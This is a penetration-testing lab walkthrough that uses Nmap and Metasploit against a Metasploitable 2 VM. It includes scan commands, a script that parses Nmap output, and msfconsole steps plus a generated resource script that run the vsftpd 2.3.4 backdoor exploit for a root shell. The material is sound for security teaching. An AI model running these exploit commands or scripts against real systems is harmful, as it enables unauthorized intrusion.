Exploiting Metasploitable2: Nmap + Metasploit Guide



This hands-on cybersecurity lab demonstrates how attackers combine reconnaissance and exploitation using Nmap and Metasploit. The setup involves two machines: a Kali Linux attacker system equipped with penetration testing tools and a vulnerable target host (here Metasploitable 2). The goal is to simulate a real-world penetration test, from target discovery through successful exploitation and session management.

The lab begins by verifying basic connectivity between both systems using ifconfig and ping commands. Once communication is confirmed, the attacker leverages Nmap to perform host discovery, identify open ports, and enumerate services running on the target. With detailed service information, potential vulnerabilities can be mapped to known exploits.

Next, the attacker launches the Metasploit Framework (msfconsole) and loads the exploit module that matches the vulnerable service discovered during scanning. Critical parameters such as the target IP address and service port are configured before the exploit is run. If successful, Metasploit establishes a session with the compromised system: for many exploits this is a Meterpreter shell, while the vsftpd backdoor used in this lab returns a plain root command shell. Either way, the attacker can interact with and control the target.

This exercise illustrates the importance of proactive defense, patching, and monitoring, while providing learners with practical exposure to offensive security methodologies in a safe, controlled environment.


Lab Setup & Tools Used:
Attacker machine: Kali Linux (192.168.142.128)
Target machine: Metasploitable 2 (192.168.142.130)
Tools used: Nmap (reconnaissance), Metasploit Framework / msfconsole (exploitation)

Check connectivity (ping from both sides)

# ifconfig                  (on Metasploitable: note its address, 192.168.142.130)
# ping 192.168.142.128      (from Metasploitable to Kali)
# ifconfig                  (on Kali: note its address, 192.168.142.128)
# ping 192.168.142.130      (from Kali to Metasploitable)

Replies in both directions confirm that the two hosts can reach each other. Now, on the Kali terminal, check which version of Nmap is installed and whether it is current:

# nmap --version

Here Nmap 7.94 is installed. That release brought several significant improvements, including the migration of Zenmap and Ndiff to Python 3, enhanced OS fingerprint matching and upgrades to the bundled libraries. At the time of writing the latest release is Nmap 7.96, which builds on these with further performance improvements and new NSE scripts; 7.94 is sufficient for this lab, but updating before a scan is good practice.

NMAP SCAN: FTP SERVICE VERSION ON THE TARGET
Command used
# nmap -sV -p 21 192.168.142.130 (metasploitable)
This scans port 21 (the default port for FTP, File Transfer Protocol) on the target and detects the version of the service listening there.

The command scans the Metasploitable target machine on IP 192.168.142.130, focusing on port 21 only.
  • The -sV option enables service version detection, which goes beyond identifying whether the port is open: Nmap probes the service and tries to determine the exact software and version, such as vsftpd 2.3.4. Case matters here: -sV is version detection, whereas a capital -S is Nmap's source-address spoofing option, so -Sv would not do what is intended.
  • The -p 21 option restricts the scan to 21/tcp instead of the default top 1000 ports, which makes the scan faster and more targeted. The IP 192.168.142.130 is the vulnerable Metasploitable machine in the lab environment.

Detect open ports

# nmap -A -p 21 192.168.142.130

By using the above command we can perform an aggressive scan on the target machine (192.168.142.130, Metasploitable), focusing only on port 21 (FTP).

-A → Enables aggressive scanning mode, which combines multiple Nmap features:

    • Service version detection (like -sV)
    • Operating system detection
    • Default Nmap NSE scripts for vulnerability and service probing
    • Traceroute information

-p 21 → Restricts the scan to port 21/tcp, which is the default FTP service port.

When executed, this scan not only checks whether FTP is open but also attempts to identify:

  • The exact FTP software and version (e.g., vsftpd 2.3.4).
  • Potential security warnings or misconfigurations.
  • The operating system running on the target host.
  • Additional service details using built-in Nmap scripts

Perform an aggressive scan and save the output

# nmap -A -oA report 192.168.142.130

This command gathers comprehensive reconnaissance data (open ports, running services, service versions, OS details and the output of Nmap's default NSE scripts) and saves the scan in three formats at once. That matters for penetration testers who need to:
 • Document findings in reports.
 • Parse results for automation or integration into other tools.
 • Maintain an audit trail of the scans conducted.

-oA report writes three files with the given base name:
report.nmap (normal, human-readable output)
report.xml (XML, for tools and parsers)
report.gnmap (grepable, one line per host, convenient for grep and awk)
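The grepable file is the one to script against. The following is an added example, not part of the original lab: it extracts the state, service and version of a given port from a report.gnmap file and decides whether the FTP banner is the version the vsftpd_234_backdoor module targets. The scan output embedded below is constructed to resemble a -sV scan of Metasploitable 2 (only the port 21 entry, vsftpd 2.3.4, is taken from the lab); the function names are the author's own.

```bash
#!/usr/bin/env bash
# Added example (not from the original lab): pull the fields a tester needs
# out of Nmap's grepable output (the report.gnmap written by -oA / -oG), so the
# version-to-exploit mapping can be scripted instead of read off the screen.
# Grepable port entries look like "21/open/tcp//ftp//vsftpd 2.3.4/":
# port/state/protocol/owner/service/rpc-info/version/
set -u

# CONSTRUCTED sample output. Only the port 21 line reflects the lab; the other
# entries are illustrative.
SAMPLE_GNMAP=$(mktemp)
trap 'rm -f "$SAMPLE_GNMAP"' EXIT
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -sV -oA report 192.168.142.130
Host: 192.168.142.130 ()	Status: Up
Host: 192.168.142.130 ()	Ports: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, 23/open/tcp//telnet//Linux telnetd/, 6200/closed/tcp//lm-x///	Ignored State: closed (996)
# Nmap done -- 1 IP address (1 host up) scanned
EOF

# Print each port entry of one host, one per line.
# (The host string is used as a regex; dots match any character, which is
# acceptable for a lab address but worth escaping in a general tool.)
gnmap_entries() {                       # usage: gnmap_entries FILE HOST
  grep "^Host: $2 " "$1" | grep -o 'Ports: .*' \
    | sed 's/^Ports: //; s/[[:space:]]*Ignored State:.*$//' \
    | tr ',' '\n' | sed 's/^[[:space:]]*//'
}

# Print the numbers of all open TCP ports for one host.
gnmap_open_ports() {                    # usage: gnmap_open_ports FILE HOST
  gnmap_entries "$1" "$2" | awk -F/ '$2 == "open" && $3 == "tcp" { print $1 }'
}

# Print "<state> <service> <version>" for a single TCP port (empty if absent).
gnmap_port() {                          # usage: gnmap_port FILE HOST PORT
  gnmap_entries "$1" "$2" \
    | awk -F/ -v p="$3" '$1 == p && $3 == "tcp" { print $2, $5, $7 }'
}

# Return 0 when the FTP banner is the version the vsftpd_234_backdoor module
# targets; this is the "map version to known exploit" step made explicit.
is_vsftpd_234() {                       # usage: is_vsftpd_234 FILE HOST
  [ "$(gnmap_port "$1" "$2" 21)" = "open ftp vsftpd 2.3.4" ]
}

echo "Open TCP ports on 192.168.142.130: $(gnmap_open_ports "$SAMPLE_GNMAP" 192.168.142.130 | tr '\n' ' ')"
echo "Port 21: $(gnmap_port "$SAMPLE_GNMAP" 192.168.142.130 21)"
if is_vsftpd_234 "$SAMPLE_GNMAP" 192.168.142.130; then
  echo "vsftpd 2.3.4 detected: candidate for exploit/unix/ftp/vsftpd_234_backdoor"
fi
```

Point the functions at the real report.gnmap from the -oA run instead of the sample file and the same checks apply to the live scan; the closed 6200/tcp entry in the sample shows why filtering on the state field matters before trusting a port list.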

NEXT STEP: EXPLOITATION

Start the Metasploit console on Kali:

# msfconsole

msf6 > search ftp

This lists several hundred FTP-related modules (exploits, auxiliary scanners and payloads), far too many to work through one by one, so narrow the search to the service version Nmap reported:

msf6 > search vsftpd

We are interested in the backdoor module, exploit/unix/ftp/vsftpd_234_backdoor. Select it by its full name rather than by its index in the search results (the index can change between Metasploit versions), review its options, point it at the target and run it:

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.142.130
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

There is no payload to choose for this module: the vsftpd 2.3.4 backdoor is triggered by a login username containing ":)" and opens a root command shell on TCP port 6200, which Metasploit connects to and presents as a plain command-shell session (not Meterpreter). Commands such as whoami, id and uname -a in that session confirm access to the target.
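The same exploitation step can be made repeatable with a Metasploit resource script, run as msfconsole -q -r FILE. The block below is an added example and not part of the original lab: it validates the target address before writing the script, so a typo cannot aim the exploit outside the lab network, and then runs msfconsole only if it is installed. The module name, RHOSTS, RPORT, exploit -z and sessions -l are Metasploit's own; the function names, the temporary file and the lab addresses are assumptions from this write-up.

```bash
#!/usr/bin/env bash
# Added example (not from the original lab): drive the exploitation step
# non-interactively with a Metasploit resource script so the same run can be
# repeated against the lab target and kept alongside the scan report.
set -u

# Accept only a plain dotted-quad IPv4 target (four octets, each 0-255).
# Assumed helper; it exists to keep the exploit inside the lab network.
valid_ipv4() {                          # usage: valid_ipv4 ADDR
  local ip=$1 IFS=. octet n=0
  case $ip in
    *[!0-9.]*|.*|*.|*..*) return 1 ;;   # non-digits, leading/trailing/empty octet
  esac
  for octet in $ip; do
    n=$((n + 1))
    [ "$octet" -le 255 ] || return 1
  done
  [ "$n" -eq 4 ]
}

# Write the resource script. "exploit -z" runs the module and backgrounds the
# resulting shell session instead of dropping into it, so the script continues
# and "sessions -l" shows what was obtained. The vsftpd backdoor module has no
# payload option, so only RHOSTS and RPORT are set.
write_vsftpd_rc() {                     # usage: write_vsftpd_rc TARGET OUTFILE
  local target=$1 out=$2
  valid_ipv4 "$target" || { echo "refusing to target '$target'" >&2; return 1; }
  cat > "$out" <<EOF
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS $target
set RPORT 21
show options
exploit -z
sessions -l
EOF
}

RC_FILE=$(mktemp)
trap 'rm -f "$RC_FILE"' EXIT
if write_vsftpd_rc 192.168.142.130 "$RC_FILE"; then
  echo "Resource script written to $RC_FILE:"
  cat "$RC_FILE"
  if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$RC_FILE"        # runs the attack; lab use only
  else
    echo "msfconsole not found on this host; on Kali run: msfconsole -q -r $RC_FILE"
  fi
fi
```

After the script finishes, interact with the backgrounded shell using sessions -i followed by the session number printed by sessions -l.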
Result:

1. Established connectivity between Kali Linux and Metasploitable
2. Verified it with ping in both directions
3. Checked the installed Nmap with nmap --version
4. Confirmed Nmap is up to date
5. Performed an aggressive scan and identified vsftpd 2.3.4 on port 21
6. Loaded the matching exploit module in msfconsole
7. Exploited Metasploitable and accessed a shell

Conclusion: This lab illustrates the complete life cycle of a penetration test in a controlled environment using two widely adopted tools: Nmap and Metasploit. The exercise begins with establishing basic connectivity between the attacker machine (Kali Linux) and the vulnerable target (Metasploitable), ensuring that the network setup is correct through IP verification and ping testing.

Once communication is confirmed, the attacker employs Nmap for reconnaissance. Nmap is first checked for availability, then used to conduct an aggressive scan, revealing open ports, running services, and system fingerprints. In this case, the scan identifies vulnerable services such as FTP (vsftpd 2.3.4), which is known to contain a backdoor vulnerability. This reconnaissance stage is crucial as it transforms raw network data into actionable intelligence for exploitation.

The next phase involves launching the Metasploit Framework (msfconsole), a powerful exploitation toolkit. By selecting the appropriate exploit module (vsftpd_234_backdoor) and configuring the target details, the attacker successfully compromises the system. Metasploit establishes a session, giving the attacker remote shell access. From here, system-level commands such as whoami or uname -a can be executed, confirming full control of the victim system.

Overall, the lab demonstrates the workflow of discovery → vulnerability identification → exploitation → post-exploitation. It highlights the importance of regular patching, vulnerability management, and monitoring to prevent attackers from leveraging outdated services and known exploits to gain unauthorized access.
